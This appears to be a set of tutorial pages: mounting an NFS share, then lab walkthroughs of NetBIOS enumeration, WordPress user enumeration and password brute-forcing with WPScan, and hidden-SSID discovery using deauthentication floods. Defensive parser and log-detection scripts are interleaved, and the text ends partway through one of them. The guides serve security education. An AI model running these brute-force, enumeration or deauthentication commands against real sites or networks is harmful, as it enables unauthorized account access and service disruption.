Mount NFS

How To Mount NFS Share On Ubuntu

Network File System (NFS)

NFS allows a system to share directories and files with others over the network. By using NFS, users and programs can access files on remote systems almost as if they were local files.

Lab Overview

In this quick guide we will illustrate how to install the needed NFS client component and mount an NFS share on an Ubuntu client. In this guide I am mounting an NFS share that I have set up on my NAS.

Lab Requirements

  1. NFS server
  2. Shared directory on the NFS server
  3. Ubuntu client

Step 1: Prepare the Ubuntu client

Lets start by updating the Ubuntu client.

sudo apt update -y

Step 2: Configure the Firewall to allow NFS traffic

Configure the firewall to allow NFS traffic; the default port for NFS is 2049. Make sure to substitute the IP address with your NFS server's IP address. My NFS server has the IP address 192.168.200.222.

sudo ufw allow from [NFS_Server_IP or NFS_subnet_address] to any port nfs

Example:

sudo ufw allow from 192.168.200.222 to any port nfs

Verify the firewall change

sudo ufw status

org@per:~$ sudo ufw status
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere
80/tcp                     ALLOW       Anywhere
443/tcp                    ALLOW       Anywhere
2049                       ALLOW       192.168.200.222
22/tcp (v6)                ALLOW       Anywhere (v6)
80/tcp (v6)                ALLOW       Anywhere (v6)
443/tcp (v6)               ALLOW       Anywhere (v6)

org@per:~$

Step 3: Install NFS common client

nfs-common provides NFS client functionality without the server component; it is what allows us to mount an NFS share.

Run the command below to install nfs-common.

sudo apt install nfs-common -y

Step 4: Configure the client and mount the NFS share

Let's make sure that we can reach the NFS share before we configure the client. Enter the command below to list the NFS shares exported by the NFS server. Change the IP address to match your NFS server.

sudo showmount --exports 192.168.200.222

org@per:~$ sudo showmount --exports 192.168.200.222
Export list for 192.168.200.222:
/i-data/19ddc0ea/nfs       *
/i-data/19ddc0ea/nfs/cloud 192.168.100.16,192.168.100.99
/i-data/19ddc0ea/nfs/NAS   192.168.100.99,192.168.100.100,192.168.100.110
org@per:~$

Create a mount point for the NFS shared folder

Next we need to create a mount point for the shared directory. The new directory is where we will mount and access our NFS share.

I am creating a new directory called cloud under /nfs.

sudo mkdir -p /Your_directory/Your_sharedfolder

Example:

sudo mkdir -p /nfs/cloud

Mount the NFS share to the new directory

Mount the shared directory on your NFS server to the new directory on the client.

sudo mount NFS_ServerIP:/Folder_on_NFS_server /Your_directory/Your_sharedfolder

Example:

sudo mount 192.168.200.222:/cloud /nfs/cloud

Confirm that the mount is successful with the command below.

sudo df -h

org@per:/$ sudo df -h
Filesystem              Size  Used Avail Use% Mounted on
udev                    953M     0  953M   0% /dev
tmpfs                   199M  1.1M  198M   1% /run
/dev/sda2                98G  4.9G   89G   6% /
tmpfs                   994M     0  994M   0% /dev/shm
tmpfs                   5.0M     0  5.0M   0% /run/lock
tmpfs                   994M     0  994M   0% /sys/fs/cgroup
/dev/loop0               90M   90M     0 100% /snap/core/7917
/dev/loop1               55M   55M     0 100% /snap/lxd/12211
/dev/loop2              218M  218M     0 100% /snap/nextcloud/19299
tmpfs                   199M     0  199M   0% /run/user/1000
/dev/loop3               92M   92M     0 100% /snap/core/8689
/dev/loop4               67M   67M     0 100% /snap/lxd/13522
192.168.200.222:/cloud  3.6T   41G  3.6T   2% /nfs/cloud
org@per:/$

Step 5: Mount the remote NFS share at boot

Configure the fstab configuration file to auto-mount the NFS share at boot. Edit the fstab configuration file and add the following line at the bottom of the file (the fields are: the remote export, the local mount point, the filesystem type, the mount options, and the dump and fsck pass numbers).

NFS_Server_IP:/Folder_on_NFS_server      /Your_directory/Your_sharedfolder      nfs auto,nofail,noatime,nolock,intr,tcp,actimeo=1800 0 0

Edit the line to match your share.

sudo nano /etc/fstab

Example:

192.168.200.222:/cloud    /nfs/cloud   nfs auto,nofail,noatime,nolock,intr,tcp,actimeo=1800 0 0

Reboot the system and confirm that the share has auto-mounted: after the reboot, type in the command below and confirm that you can see the NFS share.

sudo df -h
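As an added example (not part of the original guide), the following Python script performs the same check as the df -h step, but from /etc/fstab and /proc/mounts text: it confirms the share is both configured and mounted and flags mount options that deserve a second look. The sample fstab and mounts content are constructed; the paths and server address follow the guide.

```python
"""Check that an NFS share is in /etc/fstab and currently mounted.

Added example for this guide (not part of the original page). It parses
fstab-style and /proc/mounts-style text, looks up the share from the guide,
and flags mount options worth a second look. All sample data below is
constructed to mirror the guide's example; on a real client read the two
files instead of the constants.
"""

# Constructed sample /etc/fstab content (mirrors the guide's example line).
SAMPLE_FSTAB = """\
# /etc/fstab: static file system information.
UUID=1234-abcd  /  ext4  errors=remount-ro  0  1
192.168.200.222:/cloud    /nfs/cloud   nfs auto,nofail,noatime,nolock,intr,tcp,actimeo=1800 0 0
"""

# Constructed sample /proc/mounts content after the share has been mounted.
SAMPLE_MOUNTS = """\
/dev/sda2 / ext4 rw,relatime,errors=remount-ro 0 0
192.168.200.222:/cloud /nfs/cloud nfs4 rw,noatime,vers=4.2,rsize=1048576,proto=tcp,sec=sys 0 0
"""


def parse_fstab(text):
    """Return a list of dicts for the non-comment lines of fstab or /proc/mounts."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 4:
            raise ValueError("malformed line: %r" % raw)
        entries.append({
            "source": fields[0],
            "target": fields[1],
            "fstype": fields[2],
            "options": fields[3].split(","),
            "dump": fields[4] if len(fields) > 4 else "0",
            "pass": fields[5] if len(fields) > 5 else "0",
        })
    return entries


def find_nfs_entry(entries, server, export, mountpoint):
    """Return the entry for server:export at mountpoint, or None if absent."""
    source = "%s:%s" % (server, export)
    for entry in entries:
        if (entry["source"] == source and entry["target"] == mountpoint
                and entry["fstype"] in ("nfs", "nfs4")):
            return entry
    return None


def review_fstab_options(entry):
    """Return warnings about the mount options of an fstab NFS entry."""
    warnings = []
    opts = entry["options"]
    if "nofail" not in opts:
        warnings.append("missing nofail: boot will stall if the NFS server is unreachable")
    if "intr" in opts:
        warnings.append("intr is accepted but ignored by current kernels; it can be dropped")
    if "nolock" in opts:
        warnings.append("nolock disables NFS file locking; only safe if no other client writes the same files")
    if entry["pass"] != "0":
        warnings.append("fsck pass must be 0: a remote filesystem cannot be checked locally")
    return warnings


def check_share(server, export, mountpoint, fstab_text, mounts_text):
    """Summarise whether the share is configured in fstab and currently mounted."""
    fstab_entry = find_nfs_entry(parse_fstab(fstab_text), server, export, mountpoint)
    mount_entry = find_nfs_entry(parse_fstab(mounts_text), server, export, mountpoint)
    return {
        "in_fstab": fstab_entry is not None,
        "mounted": mount_entry is not None,
        "warnings": review_fstab_options(fstab_entry) if fstab_entry else [],
        "mounted_options": mount_entry["options"] if mount_entry else [],
    }


if __name__ == "__main__":
    report = check_share("192.168.200.222", "/cloud", "/nfs/cloud", SAMPLE_FSTAB, SAMPLE_MOUNTS)
    for key, value in report.items():
        print("%s: %s" % (key, value))
```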

Step 6: Write a file to the NFS share

Let's try out the share by creating a test file with some text in it.

echo "File from NFS Client" | sudo tee /nfs/cloud/testfile1

Display the new test file with cat.

cat /nfs/cloud/testfile1

org@per:~$ cat /nfs/cloud/testfile1
File from NFS Client

Step 7: Optional un-mounting an NFS Share

You can unmount an NFS share once nothing is using it, so first change out of the share's directory structure, then use the command below to unmount the share.

sudo umount /nfs/cloud

If you also want to prevent the share from being remounted on the next reboot, edit /etc/fstab and either delete the line or comment it out.

Conclusion

In this quick guide we configured the NFS client and mounted the NFS share on an Ubuntu client.

For more Linux quick guides please check out the Linux guide section.




NetBIOS Enumeration With Nmap, NBTScan & Nbtstat

NetBIOS Enumeration With nmap & nbtstat

NetBIOS Enumeration

With NetBIOS enumeration we can scan a local area network or a specific target on the intranet and extract NetBIOS information from it, such as:

  • Devices that belong to a domain
  • Storage shares on the network
  • Domain policies and passwords
  • Printers on the network
  • Group information and users

NetBIOS

NetBIOS stands for Network Basic Input Output System and allows communication between different applications running on different systems within a LAN.

The service uses a 16-character ASCII string to identify a device on a local network.

The first 15 characters identify the device; the 16th character (the suffix) identifies the service.

Services and ports:

  • UDP/137 Name service
  • UDP/138 Datagram service
  • TCP/139 Session service

In this quick guide I am using nmap, nbtstat on Windows, and NBTScan on Kali Linux. NBTScan can be run on Windows too if you want to try it there.

There are several tools on all platforms that you can use for NetBIOS enumeration, if you wish to test some other tools.

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.

Common NetBIOS Name Table (NBT) names

NetBIOS Code         Type    Information
<00>                 UNIQUE  Hostname
<00>                 GROUP   Domain name
<host name><03>      UNIQUE  Messenger service
<username><03>       UNIQUE  Logged-in user
<20>                 UNIQUE  File Server Service
<21>                 UNIQUE  RAS Client Service
<22>                 UNIQUE  Microsoft Exchange
<1B>                 UNIQUE  Domain Master Browser
<1C>                 GROUP   Domain Controllers
<1D>                 GROUP   Master Browser
<INet~Services>      GROUP   IIS

Requirements

  • Kali Linux
  • NBTScan
  • Nmap
  • Windows AD
  • Windows client on the same LAN as the Windows AD

Step 1: NetBIOS Enumeration With nbtstat in Windows

Open a CMD in Windows and type in the following syntax.

nbtstat -A 192.168.100.11

Ethernet0:
Node IpAddress: [192.168.100.12] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    ONLINE-IT      <00>  GROUP       Registered
    SRV1           <00>  UNIQUE      Registered
    ONLINE-IT      <1C>  GROUP       Registered
    SRV1           <20>  UNIQUE      Registered
    ONLINE-IT      <1B>  UNIQUE      Registered

    MAC Address = 01:0c:29:3c:83:4e


Npcap Loopback Adapter:
Node IpAddress: [169.254.33.233] Scope Id: []

    Host not found.

C:\>
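As an added example, not part of the original guide, this Python parser applies the suffix table above to nbtstat and nbtscan output so a defender can inventory which hosts still answer NetBIOS and what roles they advertise; the sample output is constructed from the Step 1 result.

```python
"""Decode a NetBIOS remote name table from nbtstat -A or nbtscan -v output.

Added example, not part of the original guide: it applies the guide's
suffix table (the 16th NetBIOS character) to tool output so the host name,
domain and advertised roles can be read off mechanically, e.g. for an
inventory of hosts that still answer NetBIOS. The sample below is
constructed from the guide's own nbtstat result.
"""
import re

# (suffix, type) -> meaning, from the guide's common NBT name table.
NBT_SUFFIXES = {
    ("00", "UNIQUE"): "Hostname",
    ("00", "GROUP"): "Domain name",
    ("03", "UNIQUE"): "Messenger service / logged-in user",
    ("20", "UNIQUE"): "File Server Service",
    ("21", "UNIQUE"): "RAS Client Service",
    ("22", "UNIQUE"): "Microsoft Exchange",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "GROUP"): "Master Browser",
}

# Matches nbtstat rows like "    ONLINE-IT      <00>  GROUP       Registered"
# and nbtscan rows like     "SRV1             <20>             UNIQUE".
ROW_RE = re.compile(
    r"^\s*(?P<name>\S+)\s+<(?P<suffix>[0-9A-Fa-f]{2})>\s+(?P<type>UNIQUE|GROUP)", re.M)
MAC_RE = re.compile(
    r"(?:MAC Address =|Adapter address:)\s*([0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5})")

# Constructed sample: the nbtstat -A output shown in Step 1.
SAMPLE_NBTSTAT = """\
           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    ONLINE-IT      <00>  GROUP       Registered
    SRV1           <00>  UNIQUE      Registered
    ONLINE-IT      <1C>  GROUP       Registered
    SRV1           <20>  UNIQUE      Registered
    ONLINE-IT      <1B>  UNIQUE      Registered

    MAC Address = 01:0c:29:3c:83:4e
"""


def parse_name_table(text):
    """Return (name, suffix, type, meaning) tuples for every name-table row."""
    rows = []
    for m in ROW_RE.finditer(text):
        key = (m.group("suffix").upper(), m.group("type"))
        rows.append((m.group("name"), key[0], key[1], NBT_SUFFIXES.get(key, "unknown suffix")))
    return rows


def summarize(text):
    """Derive host name, domain, roles and MAC from a decoded name table."""
    summary = {"hostname": None, "domain": None, "roles": [], "mac": None, "unknown": []}
    for name, suffix, ntype, meaning in parse_name_table(text):
        if (suffix, ntype) == ("00", "UNIQUE"):
            summary["hostname"] = name
        elif (suffix, ntype) == ("00", "GROUP"):
            summary["domain"] = name
        elif meaning == "unknown suffix":
            summary["unknown"].append((name, suffix, ntype))
        elif suffix != "03":            # <03> carries a user/host name, not a server role
            summary["roles"].append(meaning)
    mac = MAC_RE.search(text)
    if mac:
        summary["mac"] = mac.group(1).lower().replace("-", ":")
    return summary


if __name__ == "__main__":
    for row in parse_name_table(SAMPLE_NBTSTAT):
        print("%-12s <%s> %-7s %s" % row)
    print(summarize(SAMPLE_NBTSTAT))
```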

Step 2: NetBIOS Enumeration With NBTScan

NBTScan is installed by default on Kali Linux, but there is a Windows version as well.

NOTE: You need to open the tool in CMD for it to work in Windows.

We can use the tool to scan a whole network or just one target.

C:\NBTScan>nbtscan.exe  192.168.100.11-254

Doing NBT name scan for addresses from 192.168.100.11-254

IP address       NetBIOS Name     Server    User             MAC address
------------------------------------------------------------------------------
192.168.100.11   SRV1             <server>  <unknown>        01:0c:29:3c:83:4e
192.168.100.12   SRV2             <server>  <unknown>        01-0a-49-67-b8-01

C:\NBTScan>

Add the -v (verbose) argument to the syntax to extract more information.

C:\NBTScan>nbtscan.exe -v 192.168.100.11

Doing NBT name scan for addresses from 192.168.100.11


NetBIOS Name Table for Host 192.168.100.11:

Incomplete packet, 191 bytes long.
Name             Service          Type
----------------------------------------
ONLINE-IT        <00>              GROUP
SRV1             <00>             UNIQUE
ONLINE-IT        <1c>              GROUP
SRV1             <20>             UNIQUE
ONLINE-IT        <1b>             UNIQUE

Adapter address: 01:0c:29:3c:83:4e
----------------------------------------

C:\NBTScan>

You can find more arguments in NBTScan's official documentation.

Step 3: NetBIOS Enumeration With Nmap Scripting Engine

To run the nbstat.nse script, open a terminal where Nmap is installed and run the following syntax.

nmap -sV 192.168.100.11 --script nbstat.nse -v

Host script results:
| nbstat: NetBIOS name: SRV1, NetBIOS user: <unknown>, NetBIOS MAC: 01:0c:29:3c:83:4e (VMware)
| Names:
|   ONLINE-IT<00>        Flags: <group><active>
|   SRV1<00>             Flags: <unique><active>
|   ONLINE-IT<1c>        Flags: <group><active>
|   SRV1<20>             Flags: <unique><active>
|_  ONLINE-IT<1b>        Flags: <unique><active>

NSE: Script Post-scanning.
Initiating NSE at 17:50
Completed NSE at 17:50, 0.00s elapsed
Initiating NSE at 17:50
Completed NSE at 17:50, 0.00s elapsed
Read data files from: C:\Program Files (x86)\Nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.97 seconds
           Raw packets sent: 1033 (45.436KB) | Rcvd: 1011 (41.756KB)

Conclusion

As we can see, it is easy to extract information with NetBIOS enumeration techniques and tools.

We have used tools on both Windows and Linux and scanned an AD server on the domain.

To counter NetBIOS enumeration you need to disable the service; however, some old applications still rely on NetBIOS communication.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




WPScan

WordPress Enumeration with WPScan

WPScan is a vulnerability scanner that comes preinstalled with Kali Linux, but can be installed on most Linux distros.

The tool can be used to scan WordPress installations for vulnerabilities and security issues.

You can download the Turnkey image from here.

In this tutorial I am using WPScan to enumerate a WordPress website that is running on a Linux lab server. I am using a Turnkey Linux image with WordPress preinstalled for the server, and the server is running on VMware Workstation.

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.

Requirements

  • Kali Linux
  • WordPress Website

Step 1: WPScan Syntax

1.1 Update WPScan vulnerabilities database.

wpscan --update

1.2 Scan a website for vulnerabilities; you can use either a host name or an IP address.

wpscan --url 172.168.200.140

wpscan --url www.wordpress.local

NOTE: If you run WPScan on a website that is not running WordPress you will be notified in the output that the remote site is up, but not running WordPress.

_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.6.0
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________


Scan Aborted: The remote website is up, but does not seem to be running WordPress.
root@iPhone:~#

1.3 Enumerate plugins

wpscan --url www.wordpress.local --enumerate p

1.4 Scan custom directory

wpscan --url www.wordpress.local --wp-content-dir custom-content

1.5 Enumerate themes

wpscan --url www.wordpress.local --enumerate t

1.6 Stealth Scan

wpscan --url www.wordpress.local --stealthy

1.7 Enumerate users, scan the target site for WordPress authors and usernames.

wpscan --url www.wordpress.local --enumerate u

[i] User(s) Identified:

[+] admin
 | Detected By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] testuser
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)


[+] Finished: Thu Jul 18 15:09:44 2019
[+] Requests Done: 16
[+] Cached Requests: 42
[+] Data Sent: 3.339 KB
[+] Data Received: 26.85 KB
[+] Memory used: 102.207 MB
[+] Elapsed time: 00:00:01
root@iPhone:~#

NOTE: You can limit how many user IDs WPScan will enumerate.


Step 2: Brute Force WordPress Account Password

2.1 We can use WPScan to brute force a WordPress account.

To run the attack we need a password wordlist, there is one called “rockyou.txt” in Kali Linux.

You can find it in "/usr/share/wordlists/".

Type the command into terminal to brute force the password for a user

wpscan --url [wordpress url] --wordlist [path to wordlist] --username [username] --threads [number of threads]

wpscan --url www.wordpress.local --wordlist /usr/share/wordlists/rockyou.txt --username testuser --threads 2

NOTE: Eventually, you should see the password listed in the terminal next to the login ID of the user.

Step 3: Optional

3.1 Use WPScan with Tor and proxychains, for more information on how to setup Tor and proxychains please check out our notes.

NOTE: You need to start the Tor service before running the command.

proxychains wpscan --url www.wordpress.local

Conclusion

As we can see, it is very easy for an attacker to scan a WordPress site and brute force an account.

To avoid WordPress enumeration and brute-force attacks, use WordPress plugins that limit the number of login attempts for a specific username and IP address.

Furthermore, administrators should avoid using usernames as nicknames and display names; display names are shown in WordPress and are easy to scan.

WPScan scans the URLs for usernames; if the administrator username is not used for publishing, then the account won't be scanned by WPScan.
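As an added example on the defensive side (not part of the original tutorial), this Python script runs the detection logic a site owner would want over constructed web-server access log lines: it flags clients probing author IDs (the "Author Id Brute Forcing" pattern WPScan reported above) and clients posting repeatedly to wp-login.php. The thresholds and log lines are assumptions for illustration.

```python
"""Spot WPScan-style user enumeration and password guessing in web logs.

Added example, not part of the original tutorial: it reads Apache/nginx
combined-format access log lines and flags clients that probe author IDs
(/?author=N) or hammer wp-login.php, the two behaviours the tutorial's
enumeration and brute-force steps produce. All log lines are constructed.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")

# Constructed log lines: one client enumerating authors, one guessing
# passwords (WordPress answers a successful login with a 302 redirect and a
# failed one with a 200 page), and one ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jul/2019:15:09:40 +0200] "GET /?author=1 HTTP/1.1" 301 0
10.0.0.5 - - [18/Jul/2019:15:09:40 +0200] "GET /?author=2 HTTP/1.1" 301 0
10.0.0.5 - - [18/Jul/2019:15:09:41 +0200] "GET /?author=3 HTTP/1.1" 404 512
10.0.0.5 - - [18/Jul/2019:15:09:41 +0200] "GET /?author=4 HTTP/1.1" 404 512
10.0.0.5 - - [18/Jul/2019:15:09:42 +0200] "GET /wp-login.php HTTP/1.1" 200 3100
10.0.0.9 - - [18/Jul/2019:15:12:01 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
10.0.0.9 - - [18/Jul/2019:15:12:01 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
10.0.0.9 - - [18/Jul/2019:15:12:02 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
10.0.0.9 - - [18/Jul/2019:15:12:02 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
10.0.0.9 - - [18/Jul/2019:15:12:03 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
10.0.0.9 - - [18/Jul/2019:15:12:03 +0200] "POST /wp-login.php HTTP/1.1" 302 0
10.0.0.7 - - [18/Jul/2019:15:13:10 +0200] "GET /2019/07/hello-world/ HTTP/1.1" 200 8800
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyse(log_text, author_threshold=3, login_threshold=5):
    """Return {client_ip: [finding, ...]}. Thresholds are illustrative; tune per site."""
    author_ids = defaultdict(set)      # ip -> distinct author ids probed
    login_posts = defaultdict(int)     # ip -> POSTs to wp-login.php
    login_success = defaultdict(int)   # ip -> POSTs answered with a redirect
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        am = AUTHOR_RE.search(rec["path"])
        if am:
            author_ids[rec["ip"]].add(int(am.group(1)))
        if rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            login_posts[rec["ip"]] += 1
            if rec["status"] == 302:
                login_success[rec["ip"]] += 1
    findings = {}
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:
            findings.setdefault(ip, []).append("author id enumeration (%d ids)" % len(ids))
    for ip, n in login_posts.items():
        if n >= login_threshold:
            msg = "login guessing (%d POSTs)" % n
            if login_success[ip]:
                msg += ", with %d redirect(s) after POST: possible successful login" % login_success[ip]
            findings.setdefault(ip, []).append(msg)
    return findings


if __name__ == "__main__":
    for ip, notes in analyse(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(notes))
```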

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.




Uncover Hidden SSID

How To Uncover Hidden SSID With Kali Linux

In this quick lab we will go through how to uncover a hidden SSID with Kali Linux and a wireless card that can be set to monitor mode.

SSID is short for service set identifier. The SSID is the sequence of characters that uniquely identifies a wireless local area network; the name can be up to 32 alphanumeric characters and is case sensitive.

By default an access point is configured to broadcast the SSID in a beacon frame, which allows clients to discover it easily.

Some network administrators disable the broadcasting of the SSID in the configuration. This tells the access point not to include the SSID in the beacon frame, and it is done in the belief that it adds one more security layer to the network: the effect of not sending out the SSID is that only devices that know the name of the SSID can connect to the network.

Unfortunately hiding the SSID does not add any extra security layer to the WLAN. There are lots of different methods to uncover a hidden SSID; you can use Windows and Android tools to automatically discover SSIDs, so hiding the SSID should not be considered an extra security layer.

Requirements

I am using an old D-Link router with the SSID broadcast disabled; the wireless card I am using is my 8-year-old AWUS036H.

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use for illegal activity. The author is not responsible for the use of the application or the users action.

Step 1: Set Wireless card in monitor mode

1.1 Display wireless card name

sudo iwconfig

eth0      no wireless extensions.

lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Here we can see that my wireless card is called wlan0.

1.2 Kill interfering processes

sudo airmon-ng check kill

1.3 Put the interface into monitor mode. This can be achieved in different ways; I am using airmon-ng to start the card in monitor mode.

sudo airmon-ng start wlan0

NOTE: The command will create a new virtual interface with the same name as your old interface plus the word mon.

1.4 Display wireless card to confirm the new interface

sudo iwconfig 

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
eth0      no wireless extensions.

lo        no wireless extensions.

root@iPhone:~# 

Step 2: Scan for available networks

2.1 Use airodump-ng to scan for nearby networks and look for your router. I know that my BSSID is 84:C9:B2:6A:9E:90 and that I am using channel 6.

sudo airodump-ng wlan0mon

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -29      144       11    0   6  130  WPA2 CCMP   PSK  <length:  0>                   
 F0:9F:C2:AA:6C:B9  -47       45        0    0   1  195  WPA2 CCMP   PSK  Perham                         
 32:CD:A7:15:AD:49  -49       29        0    0   6  54e  WPA2 CCMP   PSK  DIRECT-SoM2020 Series          
 BC:EE:7B:7E:18:90  -49      124       12    0   9  195  WPA2 CCMP   PSK  nocco1                         
 80:2A:A8:44:C5:B1  -51       76        3    0   1  195  WPA2 CCMP   PSK  PontuS                         
 82:2A:A8:44:C5:B1  -51       63        0    0   1  195  WPA2 CCMP   PSK  <length:  0>                   
 F2:9F:C2:AA:6C:B9  -47       51        0    0   1  195  WPA2 CCMP   PSK  <length:  0>                    
 08:86:3B:DD:2C:95  -54       20        4    0   1  130  WPA2 CCMP   PSK  belkin.24d        

I can see that the first network has no SSID ("<length: 0>") and it matches my BSSID and channel.

Now note down the BSSID and the channel of your access point, cancel the current command and rerun it specifying the BSSID and channel of the hidden SSID.

sudo airodump-ng -c 6 --bssid 84:C9:B2:6A:9E:90 wlan0mon

CH  6 ][ Elapsed: 18 s ][ 2019-07-15 20:21 ][ paused output                                        
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -25  87      185       35    0   6  130  WPA2 CCMP   PSK  <length:  0>               
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0       21      

We have two options while scanning the network. The first is to wait for a new device to connect: the new device will send out a beacon frame, and airodump-ng will immediately populate the SSID in the terminal output.

I will now connect a device to the network to demonstrate how it will show up in the output.

CH  6 ][ Elapsed: 6 mins ][ 2019-07-15 20:27 ][ paused output                                         
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -24 100     3247      416    0   6  130  WPA2 CCMP   PSK  HoneyP01                   
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0      262                                       
 84:C9:B2:6A:9E:90  00:C0:CA:95:EA:8B   -7    0 - 1      2        6                                       

Observe that the ESSID now shows the name HoneyP01.

The second option is to force-disconnect one or all of the devices that are associated with the AP. We can use aireplay-ng to disconnect devices by flooding them with de-authentication packets.

2.2 Open a new terminal and send de-authentication packets to all connected devices on the router. The command will send out 5 de-authentication packets to the access point.

sudo aireplay-ng -0 5 -a 84:C9:B2:6A:9E:90 --ignore-negative wlan0mon

20:38:49  Waiting for beacon frame (BSSID: 84:C9:B2:6A:9E:90) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:38:49  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:50  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:50  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:51  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:51  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
root@iPhone:~# 

2.3 Go back to terminal one, now you should see the ESSID of the hidden WLAN.

CH  6 ][ Elapsed: 7 mins ][ 2019-07-15 20:39 ][ paused output                                        
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -16  96     4204      608    0   6  130  WPA2 CCMP   PSK  HoneyP01                   
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0      322                                       
 84:C9:B2:6A:9E:90  00:C0:CA:95:EA:8B   -7    0 - 1e     0       37                                

We can refine this and target just one associated device by adding a target station to the command.

sudo aireplay-ng -0 5 -a 84:C9:B2:6A:9E:90 -c 00:C0:CA:95:EA:8B --ignore-negative wlan0mon
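As an added example (not part of the original lab), this Python script parses airodump-ng's access-point table from two captured snapshots, lists networks with a hidden ESSID, and reports which of them were later seen with a name; the snapshots are constructed from the lab output above.

```python
"""Track hidden networks across airodump-ng snapshots.

Added example, not part of the original lab: it parses the access-point
table that airodump-ng prints, lists networks whose ESSID is hidden
("<length: N>"), and reports which hidden BSSIDs later appeared with a
name, as 84:C9:B2:6A:9E:90 did once a client associated. Both snapshots
below are constructed from the lab's terminal output.
"""
import re

MAC_RE = re.compile(r"^(?:[0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)
HIDDEN_RE = re.compile(r"^<length:\s*(\d+)>$")

# Constructed snapshot 1: the first airodump-ng scan (no RXQ column).
SNAPSHOT_1 = """\
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 84:C9:B2:6A:9E:90  -29      144       11    0   6  130  WPA2 CCMP   PSK  <length:  0>
 F0:9F:C2:AA:6C:B9  -47       45        0    0   1  195  WPA2 CCMP   PSK  Perham
 32:CD:A7:15:AD:49  -49       29        0    0   6  54e  WPA2 CCMP   PSK  DIRECT-SoM2020 Series
 82:2A:A8:44:C5:B1  -51       63        0    0   1  195  WPA2 CCMP   PSK  <length:  0>
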